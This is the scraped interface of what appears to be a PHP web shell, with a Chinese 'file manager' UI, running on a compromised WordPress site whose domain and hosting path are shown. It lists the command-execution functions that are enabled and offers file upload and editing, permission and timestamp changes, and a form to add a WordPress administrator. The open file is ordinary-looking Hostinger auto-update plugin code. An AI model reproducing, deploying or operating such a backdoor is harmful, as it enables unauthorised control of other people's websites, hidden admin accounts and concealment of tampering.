PHP文件管理器
shell_exec:
可用
exec:
可用
system:
可用
passthru:
可用
proc_open:
可用
popen:
可用
Wordpress:
可用
文件管理
数据库管理
根目录
home
u532616232
domains
b-livingdesign.com
public_html
wp-content
mu-plugins
上传文件
粘贴
新建文件
新建文件夹
添加WP管理员
名称
大小
权限
修改时间
操作
返回上级
-
-
-
-
endurance-page-cache.php
48.67 KB
0644
2025-02-04 17:37:51
编辑
下载
重命名
权限
时间
复制
剪切
删除
hostinger-auto-updates.php
3.40 KB
0644
2025-12-15 01:10:06
编辑
下载
重命名
权限
时间
复制
剪切
删除
修改权限
权限设置 (四位八进制,如 0755)
0
应用到子目录和文件
取消
确认修改
修改时间
选择新的修改时间
取消
确认修改
'wpapi.hostinger.io', 'downloads.wordpress.org' => 'wpdownloads.hostinger.io', ]; foreach ( $proxy_domains as $original_domain => $proxy_domain ) { if ( strpos( $url, $original_domain ) !== false ) { $proxy_url = str_replace( $original_domain, $proxy_domain, $url ); $response = wp_remote_request( $proxy_url, $args ); return $response; } } return $response_override; } } add_filter( 'pre_http_request', 'hostinger_use_proxy_services', 10, 3 ); /** * Modify the default auto-update tests. * * @param array $tests The array of site status tests. * @return array Modified array of site status tests. */ if ( ! function_exists( 'hostinger_change_default_autoupdates_test' ) ) { function hostinger_change_default_autoupdates_test( $tests ) { // Remove default auto-update tests unset( $tests['async']['background_updates'] ); unset( $tests['direct']['plugin_theme_auto_updates'] ); // Add a new test to indicate Hostinger manages updates $tests['direct']['hostinger_plugin_theme_auto_updates'] = [ 'label' => __( 'Auto-updates managed by Hostinger' ), 'test' => function () { $result = [ 'label' => __( 'Automatic updates managed by Hostinger' ), 'status' => 'good', 'badge' => [ 'label' => __( 'Security' ), 'color' => 'blue', ], 'description' => __( 'Automatic updates ensure your site is always running the latest and most secure versions of WordPress, plugins, and themes.' ), 'actions' => '', 'test' => 'hostinger_managed_updates', ]; return $result; }, ]; return $tests; } } add_filter( 'site_status_tests', 'hostinger_change_default_autoupdates_test' );
编辑文件: hostinger-auto-updates.php
保存
添加WordPress管理员
新用户名
邮箱
密码
生成强密码
取消
添加管理员
重命名
新名称
取消
确认